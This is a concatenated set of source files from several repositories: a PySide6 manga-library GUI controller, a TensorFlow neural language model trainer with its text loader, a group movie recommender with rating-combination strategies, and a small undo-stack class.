progressPercent = int(count / len(self.valid_series) * 100)
self.progressBar.setValue(progressPercent)
```
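The `LibraryAdder`/`QThread` wiring above is Qt's standard worker-object pattern; a stripped-down sketch of the same idea (names hypothetical) shows the moving parts without the scraping logic:

```python
from PySide6.QtCore import QObject, QThread, Signal

class Worker(QObject):
    finished = Signal()

    def run(self):
        # long-running work happens off the GUI thread here
        self.finished.emit()

thread = QThread()
worker = Worker()
worker.moveToThread(thread)        # worker's slots now execute on `thread`
thread.started.connect(worker.run)
worker.finished.connect(thread.quit)
thread.start()
```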
#### File: mangecko/controllers/controller.py
```python
from PySide6.QtGui import QPixmap, QIcon
from PySide6.QtCore import QSize
from PySide6.QtWidgets import QListWidgetItem, QWidget
from .new_volume_controller import NewVolumeDialog
from .scan_library_controller import ScanDialog
from .update_controller import UpdateDialog
from .add_library_controller import AddLibraryDialog
from ..models import database_manager
from ..views.ui_main_layout import Ui_main_window
from ..views.ui_card_widget import Ui_CardWidget
from ..views.ui_flow_layout import FlowLayout
class CardWidget(QWidget, Ui_CardWidget):
def __init__(self):
super().__init__()
# Initialize and set up various things
self.setupUi(self)
class MainWindow(QWidget, Ui_main_window):
def __init__(self):
super().__init__()
self.setupUi(self)
self.add_icons()
self.setup_flow_layout()
self.connect_slots()
        # If there are no libraries yet, disable the action buttons so they
        # can't operate on a missing selection
self.populate_library_list()
if self.libraries_list_widget.count() > 0:
self.libraries_list_widget.setCurrentRow(0)
else:
self.scan_library_btn.setEnabled(False)
self.update_library_btn.setEnabled(False)
self.new_volumes_btn.setEnabled(False)
self.libraries_list_widget.model().rowsInserted.connect(self.new_library)
def add_icons(self):
"""
        Qt Designer writes the wrong icon paths, so set them manually here.
"""
icon1 = QIcon()
icon1.addFile("resources/icons/add-128.png", QSize(), QIcon.Normal, QIcon.Off)
self.add_library_btn.setIcon(icon1)
icon2 = QIcon()
icon2.addFile("resources/icons/settings-4-128.png", QSize(), QIcon.Normal, QIcon.Off)
self.settings_btn.setIcon(icon2)
def setup_flow_layout(self):
self.series_layout = FlowLayout()
self.series_layout.setSpacing(12)
self.series_wrapper_layout_useless.addLayout(self.series_layout)
def connect_slots(self):
# Connect slots to signals
self.libraries_list_widget.currentRowChanged.connect(self.populate_series_grid)
self.add_library_btn.clicked.connect(self.add_library)
self.settings_btn.clicked.connect(self.show_settings)
self.scan_library_btn.clicked.connect(self.scan_library)
self.update_library_btn.clicked.connect(self.update_library)
self.new_volumes_btn.clicked.connect(self.view_new_volumes)
def populate_library_list(self):
self.libraries_list_widget.clear()
list = database_manager.get_libraries()
if list is None:
return
for library in list:
self.libraries_list_widget.addItem(QListWidgetItem(library[1]))
def populate_series_grid(self):
self.deleteItemsOfLayout(self.series_layout)
print("updating series grid...")
self.series_scroll_area.verticalScrollBar().setValue(0)
library_name = self.libraries_list_widget.currentItem().text()
library_id = database_manager.get_library_id(library_name)[0]
series_list = database_manager.get_series_from_library(library_id)
self.current_library_label.setText(f"{library_name} | {len(series_list)}")
for series in series_list:
card = CardWidget()
cover = QPixmap(f"data/covers/{series[2]}.jpg")
if cover.isNull():
cover = QPixmap("data/covers/no-image.png")
card.cover_label.setPixmap(cover)
card.series_label.setText(series[0])
card.series_label.setToolTip(series[0])
card.volume_label.setText(f"Volumes - {series[1]}")
self.series_layout.addWidget(card)
def add_library(self):
print("You clicked add library")
dlg = AddLibraryDialog(self)
dlg.exec()
name = dlg.get_name()
if name != "":
self.libraries_list_widget.addItem(QListWidgetItem(name))
def new_library(self):
last_row = self.libraries_list_widget.count() - 1
self.libraries_list_widget.setCurrentRow(last_row)
self.scan_library_btn.setEnabled(True)
self.update_library_btn.setEnabled(True)
self.new_volumes_btn.setEnabled(True)
def show_settings(self):
print("You clicked settings! No settings currently...")
def scan_library(self):
print("You clicked scan library")
library_name = self.libraries_list_widget.currentItem().text()
library_id = database_manager.get_library_id(library_name)[0]
dlg = ScanDialog(library_id, self)
dlg.exec()
self.populate_series_grid()
def update_library(self):
print("You clicked update library")
library_name = self.libraries_list_widget.currentItem().text()
library_id = database_manager.get_library_id(library_name)[0]
dlg = UpdateDialog(library_id, self)
dlg.exec()
self.populate_series_grid()
def view_new_volumes(self):
print("You clicked view new volumes")
library_name = self.libraries_list_widget.currentItem().text()
library_id = database_manager.get_library_id(library_name)[0]
dlg = NewVolumeDialog(library_id, self)
dlg.exec()
def deleteItemsOfLayout(self, layout):
"""
Prevents the series grid layout from overlaying cards on top of one another
when you switch back and forth between libraries. Not the most elegant...
"""
if layout is not None:
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.setParent(None)
else:
self.deleteItemsOfLayout(item.layout())
```
#### File: mangecko/controllers/new_volume_controller.py
```python
from PySide6.QtWidgets import QCheckBox, QDialog, QLabel
from ..models import database_manager
from ..views.ui_new_volume_dialog import Ui_NewVolumeDialog
class NewVolumeDialog(QDialog, Ui_NewVolumeDialog):
def __init__(self, library_id, parent=None):
super().__init__()
self.id = library_id
# Initialize and set up various things
self.setupUi(self)
self.view_button.clicked.connect(self.display)
self.close_button.clicked.connect(self.close)
def display(self):
self.view_button.setEnabled(False)
# Display series with new volumes
series = database_manager.series_with_new_volumes(self.id)
for series in series:
text = f"{series[0]}: Volume {series[1]} -> Volume {series[2]}"
item = QCheckBox(text)
self.label_layout.addWidget(item)
``` |
{
"source": "jjsr/NNLM-2003",
"score": 3
} |
#### File: NNLM-2003/src/nnlm.py
```python
import argparse
import math
import time
import numpy as np
import tensorflow as tf
from datetime import date
from preprocessing import TextLoader
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='data/',
help='data directory containing input.txt')
parser.add_argument('--batch_size', type=int, default=120,
help='minibatch size')
parser.add_argument('--win_size', type=int, default=5,
help='context sequence length')
parser.add_argument('--hidden_num', type=int, default=100,
help='number of hidden layers')
parser.add_argument('--word_dim', type=int, default=300,
help='number of word embedding')
parser.add_argument('--num_epochs', type=int, default=3,
help='number of epochs')
parser.add_argument('--grad_clip', type=float, default=10.,
help='clip gradients at this value')
args = parser.parse_args()
args_msg = '\n'.join([ arg + ': ' + str(getattr(args, arg)) for arg in vars(args)])
data_loader = TextLoader(args.data_dir, args.batch_size, args.win_size)
args.vocab_size = data_loader.vocab_size
graph = tf.Graph()
with graph.as_default():
input_data = tf.placeholder(tf.int64, [args.batch_size, args.win_size])
targets = tf.placeholder(tf.int64, [args.batch_size, 1])
with tf.variable_scope('nnlm' + 'embedding'):
embeddings = tf.Variable(tf.random_uniform([args.vocab_size, args.word_dim], -1.0, 1.0))
embeddings = tf.nn.l2_normalize(embeddings, 1)
with tf.variable_scope('nnlm' + 'weight'):
weight_h = tf.Variable(tf.truncated_normal([args.win_size * args.word_dim, args.hidden_num],
stddev=1.0 / math.sqrt(args.hidden_num)))
softmax_w = tf.Variable(tf.truncated_normal([args.win_size * args.word_dim, args.vocab_size],
stddev=1.0 / math.sqrt(args.win_size * args.word_dim)))
softmax_u = tf.Variable(tf.truncated_normal([args.hidden_num, args.vocab_size],
stddev=1.0 / math.sqrt(args.hidden_num)))
b_1 = tf.Variable(tf.random_normal([args.hidden_num]))
b_2 = tf.Variable(tf.random_normal([args.vocab_size]))
def infer_output(input_data):
"""
hidden = tanh(x * H + b_1)
output = softmax(x * W + hidden * U + b_2)
"""
input_data_emb = tf.nn.embedding_lookup(embeddings, input_data)
input_data_emb = tf.reshape(input_data_emb, [-1, args.win_size * args.word_dim])
            hidden = tf.tanh(tf.matmul(input_data_emb, weight_h) + b_1)  # bias belongs inside tanh, per the docstring
hidden_output = tf.matmul(hidden, softmax_u) + tf.matmul(input_data_emb, softmax_w) + b_2
output = tf.nn.softmax(hidden_output)
return output
outputs = infer_output(input_data)
one_hot_targets = tf.one_hot(tf.squeeze(targets), args.vocab_size, 1.0, 0.0)
loss = -tf.reduce_mean(tf.reduce_sum(tf.log(outputs) * one_hot_targets, 1))
# Clip grad.
optimizer = tf.train.AdagradOptimizer(0.1)
gvs = optimizer.compute_gradients(loss)
capped_gvs = [(tf.clip_by_value(grad, -args.grad_clip, args.grad_clip), var) for grad, var in gvs]
optimizer = optimizer.apply_gradients(capped_gvs)
embeddings_norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / embeddings_norm
processing_message_lst = list()
with tf.Session(graph=graph) as sess:
tf.global_variables_initializer().run()
for e in range(args.num_epochs):
data_loader.reset_batch_pointer()
for b in range(data_loader.num_batches):
start = time.time()
x, y = data_loader.next_batch()
feed = {input_data: x, targets: y}
train_loss, _ = sess.run([loss, optimizer], feed)
end = time.time()
processing_message = "{}/{} (epoch {}), train_loss = {:.3f}, time/batch = {:.3f}".format(
b, data_loader.num_batches,
e, train_loss, end - start)
print(processing_message)
processing_message_lst.append(processing_message)
# print("{}/{} (epoch {}), train_loss = {:.3f}, time/batch = {:.3f}".format(
# b, data_loader.num_batches,
# e, train_loss, end - start))
np.save('nnlm_word_embeddings.zh', normalized_embeddings.eval())
# record training processing
    print(end - start)
local_time = str(time.strftime("%Y-%m-%d_%H:%M:%S", time.localtime()))
with open("{}.txt".format('casdsa'), 'w', encoding='utf-8') as f:
f.write(local_time)
f.write(args_msg)
f.write('\n'.join(processing_message_lst))
if __name__ == '__main__':
main()
```
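The `infer_output` docstring corresponds to the Bengio et al. (2003) architecture, with both a direct word-to-output path and a hidden path; a NumPy restatement of the same forward pass (shapes as in the TF graph above, function name hypothetical) makes the two score terms explicit:

```python
import numpy as np

def nnlm_forward(x_emb, H, b1, W, U, b2):
    # x_emb: (batch, win_size * word_dim) concatenated context embeddings
    hidden = np.tanh(x_emb @ H + b1)          # (batch, hidden_num)
    scores = x_emb @ W + hidden @ U + b2      # direct + hidden connections
    e = np.exp(scores - scores.max(axis=1, keepdims=True))
    return e / e.sum(axis=1, keepdims=True)   # softmax over the vocabulary
```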
#### File: NNLM-2003/src/preprocessing.py
```python
import os
import codecs
import collections
from six.moves import cPickle
import numpy as np
class TextLoader():
def __init__(self, data_dir, batch_size, seq_length, mini_frq=3):
self.data_dir = data_dir
self.batch_size = batch_size
self.seq_length = seq_length
self.mini_frq = mini_frq
input_file = os.path.join(data_dir, "input_iam.txt")
vocab_file = os.path.join(data_dir, "vocab_iam.txt")
self.preprocess(input_file, vocab_file)
self.create_batches()
self.reset_batch_pointer()
def build_vocab(self, sentences):
word_counts = collections.Counter()
if not isinstance(sentences, list):
sentences = [sentences]
for sent in sentences:
word_counts.update(sent)
vocabulary_inv = ['<START>', '<UNK>', '<END>'] + [x[0] for x in word_counts.most_common() if x[1] >= self.mini_frq]
vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}
return [vocabulary, vocabulary_inv]
def preprocess(self, input_file, vocab_file):
with codecs.open(input_file, 'r', 'utf-8') as f:
lines = f.readlines()
            if lines[0][:1] == '\ufeff':  # codecs.open decodes a UTF-8 BOM to '\ufeff'
lines[0] = lines[0][1:]
lines = [line.strip().split() for line in lines]
self.vocab, self.words = self.build_vocab(lines)
self.vocab_size = len(self.words)
with open(vocab_file, 'wb') as f:
cPickle.dump(self.words, f)
raw_data = [[0] * self.seq_length + [self.vocab.get(w, 1) for w in line] + [2] * self.seq_length for line in lines]
self.raw_data = raw_data
def create_batches(self):
xdata, ydata = list(), list()
for row in self.raw_data:
for ind in range(self.seq_length, len(row)):
xdata.append(row[ind-self.seq_length:ind])
ydata.append([row[ind]])
self.num_batches = int(len(xdata) / self.batch_size)
if self.num_batches == 0:
assert False, "Not enough data. Make seq_length and batch_size small."
xdata = np.array(xdata[:self.num_batches * self.batch_size])
ydata = np.array(ydata[:self.num_batches * self.batch_size])
self.x_batches = np.split(xdata, self.num_batches, 0)
self.y_batches = np.split(ydata, self.num_batches, 0)
def next_batch(self):
x, y = self.x_batches[self.pointer], self.y_batches[self.pointer]
self.pointer += 1
return x,y
def reset_batch_pointer(self):
self.pointer = 0
``` |
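`create_batches` turns each padded row into sliding (context, next-word) pairs; a toy trace with `seq_length = 3` (token ids hypothetical, 0 and 2 being the `<START>`/`<END>` pads added in `preprocess`):

```python
row = [0, 0, 0, 7, 8, 9, 2, 2, 2]
pairs = [(row[i - 3:i], [row[i]]) for i in range(3, len(row))]
# pairs[0] == ([0, 0, 0], [7])   predict the first word from pure padding
# pairs[3] == ([7, 8, 9], [2])   predict <END> from the last three tokens
```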
{
"source": "JJSrra/Research-GroupRecommendersForMovies",
"score": 3
} |
#### File: JJSrra/Research-GroupRecommendersForMovies/baseline.py
```python
import numpy as np
import pandas as pd
def predict_group_individual_ratings_for_movie(group, movie, movie_ratings, pearson_matrix):
# Specify the K in K-nearest neighbors for each member of the group, according to Pearson
k_nearest = 10
    dim = len(pearson_matrix)  # Remember user IDs start at 1 and row/column 0 is unused, so this is one more than the user count
group_ratings = []
# Obtain all available users (those who are not members of the group)
available_users = [user for user in range(1,dim) if user not in group]
# For each user in the group, calculate their K-nearest neighbors and predict their rating
for group_user in group:
nearest_neighbors = obtain_nearest_neighbors(group_user, available_users, k_nearest, pearson_matrix)
group_ratings.append(predict_rating(group_user, nearest_neighbors, movie, movie_ratings, pearson_matrix[group_user]))
return group_ratings
def obtain_nearest_neighbors(user, available_neighbors, k_nearest, pearson_matrix):
return sorted(available_neighbors, key=lambda neighbor: pearson_matrix[user, neighbor], reverse=True)[:k_nearest]
def predict_rating(user, neighbors, movie, movie_ratings, user_correlation):
# Initialize these variables that will serve as an accumulation
neighbor_accumulated = 0
normalizer = 0
# For each neighbor, predict their rating to the movie based on Collaborative Filtering formula,
# and add the value to the normalizer accumulation
for neighbor in neighbors:
neighbor_rating = movie_ratings[neighbor][movie] if movie in movie_ratings[neighbor] else 0.0
neighbor_accumulated += neighbor_rating * user_correlation[neighbor]
normalizer += 0.0 if neighbor_rating == 0.0 else abs(user_correlation[neighbor])
# Predict the rating with the normalized accumulated value
if normalizer == 0.0:
return 0.0
else:
return neighbor_accumulated / normalizer
```
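`predict_rating` is the standard correlation-weighted collaborative-filtering estimate, summing sim(u,v)·r(v,m) over neighbors and normalizing by the summed |sim(u,v)| of neighbors that actually rated the movie; a toy check with hypothetical numbers, assuming the functions above are in scope:

```python
import numpy as np

movie_ratings = {2: {42: 4.0}, 3: {42: 2.0}, 4: {}}   # neighbor 4 never rated movie 42
correlations = np.array([0.0, 0.0, 0.8, 0.4, 0.9])    # indexed by user id
est = predict_rating(1, [2, 3, 4], 42, movie_ratings, correlations)
# (4.0 * 0.8 + 2.0 * 0.4) / (0.8 + 0.4) == 3.33...; neighbor 4 drops out of both sums
```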
#### File: JJSrra/Research-GroupRecommendersForMovies/combination_strategies.py
```python
import numpy as np
from collections import Counter
def avg(ratings):
# Remove 0.0 ratings
ratings = np.array(ratings)
ratings = ratings[ratings != 0.0]
return 0.0 if len(ratings) == 0 else ratings.mean()
def max(ratings):
# Remove 0.0 ratings
ratings = np.array(ratings)
ratings = ratings[ratings != 0.0]
return 0.0 if len(ratings) == 0 else ratings.max()
def min(ratings):
# Remove 0.0 ratings
ratings = np.array(ratings)
ratings = ratings[ratings != 0.0]
return 0.0 if len(ratings) == 0 else ratings.min()
def maj(ratings):
# Remove 0.0 ratings
ratings = np.array(ratings)
ratings = ratings[ratings != 0.0]
return 0.0 if len(ratings) == 0 else Counter(ratings).most_common()[0][0]
``` |
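A quick check of the four group-aggregation strategies on a toy rating vector; the 0.0 entries (members with no available prediction) are filtered out before combining:

```python
ratings = [4.0, 0.0, 2.0, 4.0]
avg(ratings)  # 3.33... mean of [4.0, 2.0, 4.0]
max(ratings)  # 4.0     "most pleasure"
min(ratings)  # 2.0     "least misery"
maj(ratings)  # 4.0     plurality vote
```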
{
"source": "jjst/exist-mood-import",
"score": 3
} |
#### File: jjst/exist-mood-import/daylio.py
```python
import csv
from mood import Mood
from datetime import datetime
mood_levels = {
'rad': 5,
'good': 4,
'meh': 3,
'bad': 2,
'awful': 1
}
def mood_from_row(row):
year = row[0]
day_and_month = row[1]
date_string = f'{day_and_month} {year}'
try:
d = datetime.strptime(date_string, '%d %B %Y')
    except ValueError:
return None
level = mood_levels[row[4].strip()]
tags = set([t.strip().replace(' ', '_') for t in row[5].strip().split(' | ')])
return Mood(date=d, level=level, comment=row[6], tags=tags)
def import_csv(csv_file_name):
with open(csv_file_name) as csvfile:
reader = csv.reader(csvfile)
headers = next(reader)
all_moods = [mood_from_row(row) for row in reader]
return all_moods
```
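A quick check of `mood_from_row` with a hand-written row; the column layout (year, "day month", weekday, time, mood, activities, note) is an assumption inferred from the indices used above, not a verified Daylio export.
```python
# Hypothetical row shaped like the export this parser expects.
sample_row = ['2020', '5 March', 'Thursday', '08:15', 'good', 'work | gym', 'solid day']
mood = mood_from_row(sample_row)
# level 4 ('good'), date 2020-03-05, tags {'work', 'gym'}, comment 'solid day'
print(mood)
```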
#### File: jjst/exist-mood-import/import.py
```python
import sys
import requests, json
import auth
import imoodjournal
import daylio
import os
import itertools
def acquire_attrs(attributes, token):
url = 'https://exist.io/api/1/attributes/acquire/'
attrs = [{"name": a, "active": True} for a in attributes]
response = requests.post(url, headers={'Authorization':f"Bearer {token}"},
json=attrs)
return response
def release_attrs(attributes, token):
url = 'https://exist.io/api/1/attributes/release/'
attrs = [{"name": a} for a in attributes]
response = requests.post(url, headers={'Authorization':f"Bearer {token}"},
json=attrs)
return response
def attributes(mood):
def create_attr(name, value, date):
date_format = '%Y-%m-%d'
return {"name": name, "date": date.strftime(date_format), "value": value}
attrs = [create_attr("mood", mood.level, mood.date)]
if mood.comment:
attrs.append(create_attr("mood_note", mood.comment, mood.date))
if mood.tags:
attrs.append(create_attr("custom", ", ".join(mood.tags), mood.date))
return attrs
def group(iterable, n, fillvalue=None):
args = [iter(iterable)] * n
return itertools.zip_longest(*args, fillvalue=fillvalue)
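# e.g. list(group([1, 2, 3, 4, 5], 2)) -> [(1, 2), (3, 4), (5, None)];
# publish_data below skips the trailing None fill values.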
def publish_data(moods, token):
attrs = []
    for mood in moods:
        if mood is None:  # zip_longest pads the final chunk with None fill values
            continue
        attrs += attributes(mood)
url = 'https://exist.io/api/1/attributes/update/'
response = requests.post(url, headers={'Authorization':f"Bearer {token}"},
json=attrs)
return response
def do_import(mood_data_file, token):
try:
mood_data = imoodjournal.import_csv(mood_data_file)
data_type = "imoodjournal"
except ValueError:
mood_data = daylio.import_csv(mood_data_file)
data_type = "daylio"
print(f"Loaded {data_type} data. Starting import...")
attrs = ["mood", "mood_note", "custom"]
try:
acquire_attrs(attrs, token)
chunk_size = 5
        chunk_count = -(-len(mood_data) // chunk_size)  # ceiling division
for (i, moods) in enumerate(group(mood_data, chunk_size)):
res = publish_data(moods, token)
if res.status_code != 200:
print(f"Error sending request {res.json()}")
else:
json = res.json()
failed = json['failed']
if failed:
print(f"Some attributes failed to publish: {failed}")
success = json['success']
if success:
print(f"Successfully published attributes [chunk {i + 1}/{chunk_count}]:")
print("\n".join(" - " + str(a) for a in success))
print("Finished import.")
finally:
release_attrs(attrs, token)
def main():
try:
filename = sys.argv[1]
except IndexError:
print(f"Usage: {sys.argv[0]} <daylio_or_imoodjournal_export.csv>")
sys.exit(1)
token = os.environ.get("ACCESS_TOKEN") or auth.token()
do_import(filename, token)
if __name__ == '__main__':
main()
``` |
{
"source": "jjst/radiopi",
"score": 3
} |
#### File: jjst/radiopi/console.py
```python
import colorama
def print_available_streams(player):
print(f"{colorama.Style.BRIGHT}{colorama.Fore.GREEN}Welcome to RadioPi!{colorama.Style.RESET_ALL}")
print("Available streams")
print("=================")
for idx, stream in enumerate(player.streams):
if stream.name == player.current_stream().name:
style = colorama.Style.BRIGHT
text = f"[{idx}] {stream.name} - {stream.url} [currently listening]"
else:
style = colorama.Style.DIM
text = f"[{idx}] {stream.name} - {stream.url}"
print(style + text + colorama.Style.RESET_ALL)
print("=================")
def error(msg):
print(f"{colorama.Style.BRIGHT}{colorama.Fore.RED}{msg}{colorama.Style.RESET_ALL}")
```
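A smoke test for the console helpers using stand-in objects; `Stream` and `FakePlayer` are hypothetical stubs exposing only the attributes `print_available_streams` reads.
```python
from collections import namedtuple

Stream = namedtuple("Stream", ["name", "url"])

class FakePlayer:
    streams = [Stream("FIP", "http://example.com/fip"),
               Stream("BBC 6", "http://example.com/bbc6")]
    def current_stream(self):
        return self.streams[0]

print_available_streams(FakePlayer())
error("something went wrong")
```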
#### File: jjst/radiopi/powerbutton.py
```python
import gpiozero
from gpiozero import Button
import warnings
BUTTON_GPIO_PIN = "GPIO16" # https://pinout.xyz/
SHORT_PRESS_SECONDS = 1
class PowerButton():
def __init__(self, player, pin=BUTTON_GPIO_PIN):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
            self.button = Button(pin)
self.player = player
if self.button.is_pressed:
self.player.start()
self.button.when_pressed = lambda: self._when_pressed()
self.button.when_released = lambda: self._when_released()
def _when_released(self):
self.player.stop()
def _when_pressed(self):
self.player.start()
``` |
{
"source": "jjstrydom/disaster-response-pipelines",
"score": 3
} |
#### File: disaster-response-pipelines/data/process_data.py
```python
import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
"""
Loads the data from csv files containing the messages and the target categories.
:param messages_filepath: file path string to the messages csv file
:param categories_filepath: file path string to the categories csv file
:return: dataframe containing the messages and the categories
"""
# load messages dataset
messages = pd.read_csv(messages_filepath)
# load categories dataset
categories = pd.read_csv(categories_filepath)
# merge datasets
df = pd.merge(messages, categories, left_on="id", right_on="id")
# create a dataframe of the 36 individual category columns
categories = df.categories.str.split(';', expand=True)
# extract a list of new column names for categories.
category_colnames = categories.iloc[0].str.split('-', expand=True)[0]
# rename the columns of `categories`
categories.columns = category_colnames
for column in categories:
# set each value to be the last character of the string & convert column from string to numeric
categories[column] = categories[column].str.split('-', expand=True)[1].astype(int)
# drop the original categories column from `df`
df.drop(columns=['categories'], inplace=True)
# concatenate the original dataframe with the new `categories` dataframe
df = pd.merge(df, categories, left_index=True, right_index=True)
return df
def clean_data(df):
"""
Takes a dataframe and cleans the data.
:param df: pandas dataframe containing the data to clean
:return: pandas dataframe with cleaned data
"""
# drop duplicates
    df = df[~df.duplicated()]
    # force the related category to be binary (it contains a stray value of 2)
df.loc[df['related']==2,'related'] = 1
# remove outlier rows where there are more than 15 labels on a message
# df.drop(df[df.columns[4:]].sum(axis=1) >= 16, inplace=True)
# There is no data on category child_alone - removing for now to reduce requirements on downstream processes
    # update: rubric asks for all 36 columns which is silly :(
# df.drop(columns=['child_alone'], inplace=True)
return df
def save_data(df, database_filename):
"""
Saves the data to disk at the specified filepath.
:param df: pandas dataframe containing the data to save
:param database_filename: filepath & name string to save the data to
:return: None (data saved to disk)
"""
engine = create_engine(f"sqlite:///{database_filename}")
df.to_sql('project_data', engine, index=False)
def main():
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '\
'datasets as the first and second argument respectively, as '\
'well as the filepath of the database to save the cleaned data '\
'to as the third argument. \n\nExample: python process_data.py '\
'disaster_messages.csv disaster_categories.csv '\
'DisasterResponse.db')
if __name__ == '__main__':
main()
```
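For clarity, here is the category transformation from `load_data` run in isolation on a made-up two-row frame; the real CSV has 36 such categories.
```python
import pandas as pd

df = pd.DataFrame({"categories": ["related-1;request-0;offer-0",
                                  "related-0;request-1;offer-0"]})
categories = df.categories.str.split(';', expand=True)
categories.columns = categories.iloc[0].str.split('-', expand=True)[0]
for column in categories:
    categories[column] = categories[column].str.split('-', expand=True)[1].astype(int)
print(categories)
#    related  request  offer
# 0        1        0      0
# 1        0        1      0
```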
#### File: disaster-response-pipelines/models/train_classifier.py
```python
import sys
import psutil
from sqlalchemy import create_engine
import pandas as pd
import joblib
import nltk
import ssl
# dealing with certificate issues when trying to download using nltk
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
pass
else:
ssl._create_default_https_context = _create_unverified_https_context
nltk.download('punkt')
nltk.download('wordnet')
nltk.download('stopwords')
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from nltk.corpus import stopwords
from sklearn.metrics import recall_score, precision_score, f1_score, accuracy_score, roc_auc_score
from sklearn.pipeline import Pipeline
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.model_selection import GridSearchCV
def load_data(database_filepath):
"""
Load the dataset from the local database specified by the database filepath and return the messages as well as their
targets and target names.
:param database_filepath: path string to database file location
:return: tuple of length 3 (X, Y, T) containing
X = messages,
Y = targets,
T = target names
"""
# load data from database
engine = create_engine(f"sqlite:///{database_filepath}")
df = pd.read_sql_table('project_data', con=engine)
X = df['message']
Y = df[df.columns[-36:]]
T = Y.columns
return X, Y, T
def tokenize(text):
"""
Take a piece of text and perform NLP (Natural Language Processing) steps. The function tokenizes the message text,
removes the stopwords, performs lemmatization, and converts the tokens to lowercase.
:param text: a string of text to process
:return: list containing clean tokes (strings) generated from the text
"""
# process text data to tokens
tokens = word_tokenize(text)
words = [w for w in tokens if w not in stopwords.words("english")]
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in words:
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
def build_model():
"""
Construct the sklearn pipeline that vectorizes input messages, performs TF-IDF, and multi output classification
using a random forest classifier.
:return: a sklearn pipeline object
"""
pipeline = Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer()),
('clf', MultiOutputClassifier(RandomForestClassifier(n_jobs=psutil.cpu_count()), n_jobs=psutil.cpu_count()))
])
return pipeline
def grid_search(pipeline):
    """
    Wrap the pipeline in a grid search over the classifier hyperparameters.
    :param pipeline: sklearn pipeline to tune
    :return: a GridSearchCV object wrapping the pipeline
    """
parameters = {
'clf__estimator__n_estimators': [100, 1000],
# 'clf__estimator__criterion': ['gini', 'entropy'],
# 'clf__estimator__class_weight': [None, 'balanced', 'balanced_subsample']
}
cv = GridSearchCV(pipeline, param_grid=parameters)
return cv
def print_scores(category, precision, recall, f1score, accuracy, AUC):
"""
Print the scores nicely formatted so that consecutive prints using this function results in a table structure on
screen.
:param category: name of category as a string
:param precision: precision metric as a float
:param recall: recall metric as a float
:param f1score: f1score metric as a float
:param accuracy: accuracy metric as a float
:param AUC: AUC metric as a float
:return: None (prints to screen)
"""
print(f"{category:23}: {precision:9.3f} {recall:9.3f} {f1score:9.3f} {accuracy:9.3f} {AUC:9.3f}")
def evaluate_model(model, X_test, Y_test, category_names):
"""
Evaluate the performance of the model for each category and print it to screen.
:param model: the trained model to evaluate
:param X_test: Test messages
:param Y_test: Test targets
:param category_names: Category names of the targets present in the data.
:return: None (prints to screen)
"""
y_pred_raw = model.predict(X_test)
y_pred = pd.DataFrame(y_pred_raw, columns=category_names)
print(f"class : precision recall f1score accuracy AUC")
for c in category_names:
precision = precision_score(Y_test[c], y_pred[c], zero_division=0)
recall = recall_score(Y_test[c], y_pred[c], zero_division=0)
f1score = f1_score(Y_test[c], y_pred[c], zero_division=0)
accuracy = accuracy_score(Y_test[c], y_pred[c])
try:
AUC = roc_auc_score(Y_test[c], y_pred[c])
except ValueError:
AUC = float('nan')
print_scores(c, precision, recall, f1score, accuracy, AUC)
precision = precision_score(Y_test, y_pred, average='weighted', zero_division=0)
recall = recall_score(Y_test, y_pred, average='weighted', zero_division=0)
f1score = f1_score(Y_test, y_pred, average='weighted', zero_division=0)
accuracy = accuracy_score(Y_test, y_pred)
# remove columns that are made up of only 1 class so we can calculate a valid AUC
valid_cols = [c for c in Y_test.columns if len(Y_test[c].unique()) == 2]
AUC = roc_auc_score(Y_test[valid_cols], y_pred[valid_cols])
print(" - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -")
print_scores('TOTAL', precision, recall, f1score, accuracy, AUC)
def save_model(model, model_filepath):
"""
Saves the model to disk.
:param model: the trained model to save
:param model_filepath: filepath to save to
:return: None
"""
# save model to model filepath
joblib.dump(model, model_filepath)
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Building grid search over model parameters...')
grid = grid_search(model)
print('Training model...')
grid.fit(X_train, Y_train)
print(grid.best_params_)
print('Evaluating model...')
evaluate_model(grid, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(grid, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main()
``` |
{
"source": "jj-style/Backgammon",
"score": 4
} |
#### File: Backgammon/Coursework/classUndoStack.py
```python
class MyStack():
def __init__(self):
self.size = 5
self.stack = [0 for i in range(self.size)]
self.front = -1
self.inStack = 0
def add(self,item):
if self.front != self.size-1:
if self.inStack < 5:
self.inStack+=1
self.front = (self.front+1) % self.size
self.stack[self.front] = item
else:
self.inStack-=1
self.front = -1
self.add(item)
def remove(self):
empty = self.isEmpty()
if not empty:
self.inStack-=1
self.front = (self.front-1) % self.size
return self.stack[(self.front+1) % self.size]
else:
return False
def isEmpty(self):
return (self.inStack == 0)
```
